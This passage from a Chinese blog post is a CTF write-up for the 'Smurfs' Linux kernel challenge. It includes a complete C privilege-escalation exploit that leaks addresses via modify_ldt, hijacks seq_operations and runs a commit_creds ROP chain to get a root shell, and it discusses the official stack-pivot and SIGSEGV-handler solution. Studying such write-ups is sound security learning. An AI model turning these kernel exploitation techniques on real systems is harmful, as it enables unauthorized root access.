<p>代码如下,就是在<code>0xffff888000000000</code>的基础上每次加<code>0x40000000</code>，至于为什么要加<code>0x40000000</code>,我猜测是<code>page_offset_base</code>也是指定的几位随机化，和代码段一样。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">size_t</span> page_offset_base=<span class="number">0xffff888000000000</span>;</span><br><span class="line">   *(<span class="keyword">size_t</span> *)buf1=page_offset_base;</span><br><span class="line">   <span class="keyword">while</span>(<span class="number">1</span>)&#123;</span><br><span class="line">       chunk_edit(<span class="number">0</span>,buf1);</span><br><span class="line">       <span class="keyword">int</span> ret=syscall(SYS_modify_ldt,<span class="number">0</span>,buf1,<span class="number">8</span>);</span><br><span class="line">       <span class="keyword">if</span>(ret&lt;<span class="number">0</span>)&#123;</span><br><span class="line">           page_offset_base+=<span class="number">0x40000000</span>;</span><br><span class="line">           *(<span class="keyword">size_t</span> *)buf1=page_offset_base;</span><br><span class="line">           <span class="keyword">continue</span>;</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">break</span>;</span><br><span class="line">   &#125;</span><br><span class="line">   <span class="built_in">printf</span>(<span class="string">&quot;page_offset_base_addr:%p\n&quot;</span>,page_offset_base);</span><br></pre></td></tr></table></figure>

<p>爆破出来<code>page_offset_base</code>,那就可以利用<code>read_ldt</code>在这段地址上读取堆信息，堆中就有kernel_base地址，然后就是<code>seq_operations</code>+内核<code>pt_regs</code>栈迁移打了。</p>
<h3 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;pthread.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;errno.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;signal.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;poll.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/syscall.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/sem.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;semaphore.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;poll.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/syscall.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;asm/ldt.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/prctl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> add_rsp_0x180_pop_3_ret 0xffffffff815141ae</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> pop_rdi_ret 0xffffffff8108c420</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> swapgs_restore_regs_and_return_to_usermode 0xffffffff81c00fb0</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> commit_creds 0xffffffff810c9540</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> prepare_kernel_cred 0xffffffff810c99d0</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> pop_2_ret 0xffffffff810006a6</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> ret_gadget 0xffffffff810001fc</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">size_t</span> ret_addr;</span><br><span class="line"><span class="keyword">size_t</span> pop_2_ret_addr;</span><br><span class="line"><span class="keyword">size_t</span> add_rsp_0x180_pop_3_ret_addr;</span><br><span class="line"><span class="keyword">size_t</span> pop_rdi_ret_addr;</span><br><span class="line"><span class="keyword">size_t</span> swapgs_restore_regs_and_return_to_usermode_addr;</span><br><span class="line"><span class="keyword">size_t</span> commit_creds_addr;</span><br><span class="line"><span class="keyword">size_t</span> prepare_kernel_cred_addr;</span><br><span class="line"><span class="keyword">int</span> offsets;</span><br><span class="line"><span class="keyword">size_t</span> vmlinux_nokaslr_addr=<span class="number">0xffffffff81000000</span>;</span><br><span class="line"><span class="keyword">size_t</span> kernel_base=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">size_t</span> user_cs,user_ss,user_rflags,user_sp;</span><br><span class="line"></span><br><span class="line"><span class="keyword">int</span> ko_fd;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">saveStatus</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    __asm__(<span class="string">&quot;mov user_cs, cs;&quot;</span></span><br><span class="line">            <span class="string">&quot;mov user_ss, ss;&quot;</span></span><br><span class="line">            <span class="string">&quot;mov user_sp, rsp;&quot;</span></span><br><span class="line">            <span class="string">&quot;pushf;&quot;</span></span><br><span class="line">            <span class="string">&quot;pop user_rflags;&quot;</span></span><br><span class="line">            );</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;[*]status has ben saved.&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">usr_shell</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;getshelling&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(getuid()==<span class="number">0</span>)&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;[*]----getshell ok&quot;</span>);</span><br><span class="line">        system(<span class="string">&quot;cat /flag&quot;</span>);</span><br><span class="line">        system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;[*] getshell fail&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">chunk_free</span><span class="params">(<span class="keyword">size_t</span> idx)</span></span>&#123;</span><br><span class="line">    <span class="keyword">size_t</span> args[<span class="number">3</span>];</span><br><span class="line">    args[<span class="number">0</span>]=idx;</span><br><span class="line">    ioctl(ko_fd,<span class="string">&#x27;0&#x27;</span>,args);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">chunk_edit</span><span class="params">(<span class="keyword">size_t</span> idx,<span class="keyword">char</span> *buf)</span></span>&#123;</span><br><span class="line">    <span class="keyword">size_t</span> args[<span class="number">3</span>];</span><br><span class="line">    args[<span class="number">0</span>]=idx;</span><br><span class="line">    args[<span class="number">1</span>]=<span class="number">8</span>;</span><br><span class="line">    args[<span class="number">2</span>]=buf;</span><br><span class="line">    ioctl(ko_fd,<span class="string">&#x27;P&#x27;</span>,args);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">chunk_add</span><span class="params">(<span class="keyword">size_t</span> size,<span class="keyword">char</span> *buf)</span></span>&#123;</span><br><span class="line">    <span class="keyword">size_t</span> args[<span class="number">3</span>];</span><br><span class="line">    args[<span class="number">0</span>]=size;</span><br><span class="line">    args[<span class="number">1</span>]=buf;</span><br><span class="line">    ioctl(ko_fd,<span class="string">&#x27; &#x27;</span>,args);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">debug</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] debug\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">int</span> seq_fd;</span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">user_desc</span> <span class="title">u_desc</span>;</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> ** argv, <span class="keyword">char</span> ** envp)</span></span>&#123;</span><br><span class="line">    saveStatus();</span><br><span class="line">    <span class="keyword">char</span> buf1[<span class="number">0x1000</span>];</span><br><span class="line">    <span class="keyword">char</span> buf2[<span class="number">0x1000</span>];</span><br><span class="line">    ko_fd=open(<span class="string">&quot;/dev/kernelpwn&quot;</span>,<span class="number">0</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">memset</span>(buf1,<span class="number">0</span>,<span class="number">0x1000</span>);</span><br><span class="line">    chunk_add(<span class="number">0x10</span>,buf1);</span><br><span class="line">    chunk_free(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    u_desc.base_addr=<span class="number">0xff0000</span>;</span><br><span class="line">    u_desc.entry_number=<span class="number">0x1000</span>/<span class="number">8</span>;</span><br><span class="line">    u_desc.limit=<span class="number">0</span>;</span><br><span class="line">    u_desc.seg_32bit=<span class="number">0</span>;</span><br><span class="line">    u_desc.contents=<span class="number">0</span>;</span><br><span class="line">    u_desc.read_exec_only=<span class="number">0</span>;</span><br><span class="line">    u_desc.limit_in_pages=<span class="number">0</span>;</span><br><span class="line">    u_desc.seg_not_present=<span class="number">0</span>;</span><br><span class="line">    u_desc.useable=<span class="number">0</span>;</span><br><span class="line">    u_desc.lm=<span class="number">0</span>;</span><br><span class="line">    syscall(SYS_modify_ldt,<span class="number">1</span>,&amp;u_desc,<span class="keyword">sizeof</span>(u_desc));</span><br><span class="line"></span><br><span class="line">    <span class="keyword">size_t</span> page_offset_base=<span class="number">0xffff888000000000</span>;</span><br><span class="line">    *(<span class="keyword">size_t</span> *)buf1=page_offset_base;</span><br><span class="line">    <span class="keyword">while</span>(<span class="number">1</span>)&#123;</span><br><span class="line">        chunk_edit(<span class="number">0</span>,buf1);</span><br><span class="line">        <span class="keyword">int</span> ret=syscall(SYS_modify_ldt,<span class="number">0</span>,buf1,<span class="number">8</span>);</span><br><span class="line">        <span class="keyword">if</span>(ret&lt;<span class="number">0</span>)&#123;</span><br><span class="line">            page_offset_base+=<span class="number">0x40000000</span>;</span><br><span class="line">            *(<span class="keyword">size_t</span> *)buf1=page_offset_base;</span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;page_offset_base_addr:%p\n&quot;</span>,page_offset_base);</span><br><span class="line">    <span class="comment">// size_t addr=page_offset_base;</span></span><br><span class="line">    <span class="comment">// *(size_t *)buf1=addr;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// for(int i=0;i&lt;0x200;i++)&#123;</span></span><br><span class="line">    <span class="comment">//     chunk_edit(0,buf1);</span></span><br><span class="line">    <span class="comment">//     int ret=syscall(SYS_modify_ldt,0,buf2,0x1000);</span></span><br><span class="line">    <span class="comment">//     if(ret&lt;0)&#123;</span></span><br><span class="line">    <span class="comment">//         printf(&quot;write again fail\n&quot;);</span></span><br><span class="line">    <span class="comment">//         continue;</span></span><br><span class="line">    <span class="comment">//     &#125;</span></span><br><span class="line">    <span class="comment">//     for(int j=0;j&lt;0x1000/8;j++)&#123;</span></span><br><span class="line">    <span class="comment">//         size_t content=*((size_t *)buf2+j);</span></span><br><span class="line">    <span class="comment">//         if((content&amp;0xffffffff00000000)==0xffffffff00000000)&#123;</span></span><br><span class="line">    <span class="comment">//             if((content&amp;0xffffffff)!=0xffffffff)&#123;</span></span><br><span class="line">    <span class="comment">//                 printf(&quot;kernel_addr:%p  content:%p\n&quot;,addr+8*j,*((size_t *)buf2+j));</span></span><br><span class="line">    <span class="comment">//             &#125;</span></span><br><span class="line">                </span><br><span class="line">    <span class="comment">//         &#125;</span></span><br><span class="line">    <span class="comment">//     &#125;</span></span><br><span class="line">    <span class="comment">//     addr+=0x1000;</span></span><br><span class="line">    <span class="comment">//     *(size_t *)buf1=addr;</span></span><br><span class="line">    <span class="comment">//     memset(buf2,0,0x1000);</span></span><br><span class="line">    <span class="comment">// &#125;</span></span><br><span class="line">    <span class="keyword">size_t</span> addr=page_offset_base+<span class="number">0x9d000</span>;</span><br><span class="line">    *(<span class="keyword">size_t</span> *)buf1=addr;</span><br><span class="line">    chunk_edit(<span class="number">0</span>,buf1);</span><br><span class="line">    syscall(SYS_modify_ldt,<span class="number">0</span>,buf2,<span class="number">0x1000</span>);</span><br><span class="line">    kernel_base=*(<span class="keyword">size_t</span> *)buf2<span class="number">-0x40</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[*] kernel_base:%p\n&quot;</span>,kernel_base);</span><br><span class="line"></span><br><span class="line">    chunk_add(<span class="number">0x20</span>,buf1);</span><br><span class="line">    chunk_free(<span class="number">1</span>);</span><br><span class="line">    seq_fd=open(<span class="string">&quot;/proc/self/stat&quot;</span>, O_RDONLY);</span><br><span class="line">    add_rsp_0x180_pop_3_ret_addr=add_rsp_0x180_pop_3_ret-vmlinux_nokaslr_addr+kernel_base;</span><br><span class="line">    pop_rdi_ret_addr=pop_rdi_ret-vmlinux_nokaslr_addr+kernel_base;</span><br><span class="line">    commit_creds_addr=commit_creds-vmlinux_nokaslr_addr+kernel_base;</span><br><span class="line">    prepare_kernel_cred_addr=prepare_kernel_cred-vmlinux_nokaslr_addr+kernel_base;</span><br><span class="line">    swapgs_restore_regs_and_return_to_usermode_addr=swapgs_restore_regs_and_return_to_usermode-vmlinux_nokaslr_addr+kernel_base+<span class="number">0xe</span>;</span><br><span class="line">    *(<span class="keyword">size_t</span> *)buf1=add_rsp_0x180_pop_3_ret_addr;</span><br><span class="line">    chunk_edit(<span class="number">1</span>,buf1);</span><br><span class="line">    __asm__(</span><br><span class="line">        <span class="string">&quot;mov r15, pop_rdi_ret_addr;&quot;</span></span><br><span class="line">        <span class="string">&quot;mov r14, 0;&quot;</span></span><br><span class="line">        <span class="string">&quot;mov r13, prepare_kernel_cred_addr;&quot;</span></span><br><span class="line">        <span class="string">&quot;mov r12, commit_creds_addr;&quot;</span></span><br><span class="line">        <span class="string">&quot;mov rbp, swapgs_restore_regs_and_return_to_usermode_addr;&quot;</span></span><br><span class="line">        <span class="string">&quot;mov rax, 0;&quot;</span></span><br><span class="line">        <span class="string">&quot;mov rdi, seq_fd;&quot;</span></span><br><span class="line">        <span class="string">&quot;mov rsi, rsp;&quot;</span></span><br><span class="line">        <span class="string">&quot;mov rdx, 0x200;&quot;</span></span><br><span class="line">        <span class="string">&quot;syscall;&quot;</span></span><br><span class="line">    );</span><br><span class="line">    <span class="comment">// read(seq_fd,buf1,0x200);</span></span><br><span class="line">    usr_shell();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="官方解法"><a href="#官方解法" class="headerlink" title="官方解法"></a>官方解法</h2><p>十分巧妙的解法，学到了很多。</p>
<p>官方前期的地址爆破和我大差不差，但在后面对<code>seq_operations</code>的<code>start</code>指针的利用开始不一样了，由于只开了<code>kpti</code>和<code>smep</code>，所以在内核态还是可以访问用户态数据的，所以可以在用户态布置内核rop然后在内核态直接把sp寄存器迁移到用户态。</p>
<p><img src="https://ctf-wiki.org/pwn/linux/kernel-mode/defense/isolation/user-kernel/figure/476px-Kernel_page-table_isolation.svg.png" alt="File:Kernel page-table isolation.svg"></p>
<p>那么问题来了，怎么利用一个函数指针让rsp指向自己布置在内核态的rop呢，官方解法里给出了一个十分巧妙（至少我第一次见）的方法，就是利用以下gadget</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">xchg_eax_esp</span><br><span class="line">ret</span><br></pre></td></tr></table></figure>

<p>xchg就是互换两个寄存器的数据，一般函数指针都是先加载到rax寄存器中然后再<code>call rax</code>的，所以执行<code>xchg eax, esp</code>的时候rax就指向这个gadget的地址，这个gadget的地址是可控的，但是可惜是内核地址，但是注意这个gadget只是交换寄存器的后32位，交换完后的esp就落到了用户态了，随意我们只要<code>mmap(xchg_eax_esp &amp; 0xfffff000, 0x2000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);</code>就可以把rsp指向用户态了。</p>
<p>官解在布置rop的时候没有重新设置<code>cr3</code>的值，也就是没有更换页表，所以最后返回用户态之后执行指令肯定会爆段错误，官解是这样处理的,他设置了段错误的处理函数，这样在发生了段错误以后，重新陷入内核态，然后内核态自动切换到用户态然后执行处理函数<code>spawn_shell</code>，这样就可以不用我们布置但是完美的返回到了用户态并执行用户态指令了。</p>
<p>但是直接布置<code>swapgs_restore_regs_and_return_to_usermode</code>使用的内存其实差不多的，嘿嘿，可以用但是没必要。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">spawn_shell</span><span class="params">(<span class="keyword">void</span>)</span></span>&#123;</span><br><span class="line">    system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">signal(SIGSEGV, spawn_shell);</span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>通过这道题也是学到了很多，更加熟悉用户态页表和内核态页表的隔离机制了，比如开了kpti但是不开smep在内核态时其实和开了没有差别，但是开了kpti开不开smap差别还是挺大的。</p>
<p>然后是对<code>swapgs_restore_regs_and_return_to_usermode</code>的理解，在学习<code>ret2dir</code>的时候我不理解为什么交换了页表之后还是可以继续执行<code>swapgs_restore_regs_and_return_to_usermode</code>,通过<code>mit6.s081</code>的学习，能这样做的唯一解法就是这个函数在用户态和内核态都进行了映射，然后映射的虚拟地址是一模一样的，也佐证了用户态页表映射了少量的内核态地址。</p>
<p>这道题在爆破到内核地址后就是比较简单了，原因是没有开<code>pt_regs</code>的偏移和<code>smap</code>,假如这两个都开了的话，目前我能想到的解法就是利用<code>ret2dir</code>进行rop了，这样会比较麻烦。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/08/09/mit6-s081/" rel="prev" title="mit6.s081">
      <i class="fa fa-chevron-left"></i> mit6.s081
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%8D%8A%E5%86%B3%E8%B5%9B-Smurfs%E5%A4%8D%E7%8E%B0"><span class="nav-number">1.</span> <span class="nav-text">蓝帽杯半决赛 Smurfs复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B8%E5%85%B3%E5%86%85%E6%A0%B8%E7%9F%A5%E8%AF%86%E5%AD%A6%E4%B9%A0"><span class="nav-number">1.2.</span> <span class="nav-text">相关内核知识学习</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%BF%9B%E7%A8%8Bldt"><span class="nav-number">1.2.1.</span> <span class="nav-text">进程ldt</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#modify-ldt-%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8"><span class="nav-number">1.2.2.</span> <span class="nav-text">modify_ldt 系统调用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ldt-struct"><span class="nav-number">1.2.2.1.</span> <span class="nav-text">ldt_struct</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#moddify-ldt%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8"><span class="nav-number">1.2.2.2.</span> <span class="nav-text">moddify_ldt系统调用</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%B8%80-%E9%81%8D%E5%8E%86%E5%86%85%E5%AD%98%E6%B3%84%E9%9C%B2%E5%9C%B0%E5%9D%80%E4%BF%AE%E6%94%B9%E8%BF%9B%E7%A8%8Bcred%E5%AE%8C%E6%88%90%E6%8F%90%E6%9D%83"><span class="nav-number">1.3.</span> <span class="nav-text">解法一 遍历内存泄露地址修改进程cred完成提权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C-%E9%81%8D%E5%8E%86%E5%86%85%E5%AD%98%E6%B3%84%E9%9C%B2%E5%9C%B0%E5%9D%80%E5%8A%AB%E6%8C%81seq-operations-rop%E6%8F%90%E6%9D%83"><span class="nav-number">1.4.</span> <span class="nav-text">解法二 遍历内存泄露地址劫持seq_operations+rop提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF"><span class="nav-number">1.4.1.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%84%9A%E6%9C%AC"><span class="nav-number">1.4.2.</span> <span class="nav-text">脚本</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%98%E6%96%B9%E8%A7%A3%E6%B3%95"><span class="nav-number">1.5.</span> <span class="nav-text">官方解法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.6.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">rootzhang</p>
  <div class="site-description" itemprop="description">我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">37</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rootzhang</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
